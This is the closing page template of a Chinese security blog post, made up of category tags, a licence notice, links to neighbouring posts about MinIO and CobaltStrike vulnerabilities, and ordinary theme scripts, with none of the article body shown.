Antonio Nappi, Lukas Gedvilas, 2019</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/04/17/%E6%AF%95%E8%AE%BE%E7%AC%94%E8%AE%B0minio/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">MinIO verify 接口信息泄露-RCE分析(CVE-2023-28432)</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/03/15/%E6%AF%95%E8%AE%BE%E7%AC%94%E8%AE%B0cs/">
                        <span class="hidden-mobile">CobaltStrike 存储型XSS-RCE（CVE-2022-39197)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/Romanc9" target="_blank" rel="nofollow noopener"><span>Luoman</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>



  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
